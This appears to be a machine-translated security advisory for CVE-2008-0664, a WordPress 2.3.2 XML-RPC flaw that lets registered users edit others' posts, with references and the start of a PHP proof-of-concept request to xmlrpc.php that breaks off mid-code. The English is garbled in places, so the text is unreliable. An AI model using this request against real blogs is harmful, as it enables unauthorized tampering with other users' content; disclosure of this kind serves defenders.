Issues the date: 2008-02-07
Renewal date: 2008-07-07
Is affected the system:
WordPress WordPress 2.3.2
Not affected system:
WordPress WordPress 2.3.3
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 27669
CVE(CAN) ID: CVE-2008-0664
WordPress is a section of free forum Blog system.
If has begun using registration, WordPress XML-RPC realizes (xmlrpc.php) to be unable the post_type execution inspection which establishes to the page, this permission long-distance aggressor to the forum submission evil intention requested that changes editor other users posting.
<* origin: Columcille
Link: http://secunia.com/advisories/28823
http://trac.wordpress.org/ticket/5313
http://wordpress.org/development/2008/02/wordpress-233/
https://bugzilla.redhat.com/long_list.cgi?buglist=431547
http://www.village-idiot.org/archives/2008/02/02/wordpress-232-exploit-confirmed/
http://www.debian.org/security/2008/dsa-1601
*>
Test method:
--------------------------------------------------------------------------------
Warning
The following procedure (method) possibly has the aggressivity, only supplies the safe research and teaching. The user risk is proud!
<? php
/**
* POC: XMLRPC Hack
*
*/
$host = ''; // blog url
$page = '/xmlrpc.php';
$data = '<? xml version= " 1.0 "? >
<methodcall>
<methodname>metaWeblog.editPost</methodname>
<params>
<value>
<i4>post_ID</i4>
</value>
<value>
<string>username</string>
</value>
<value>
Other pages: : 1 * 2 * 3 * 4 * Next>>
|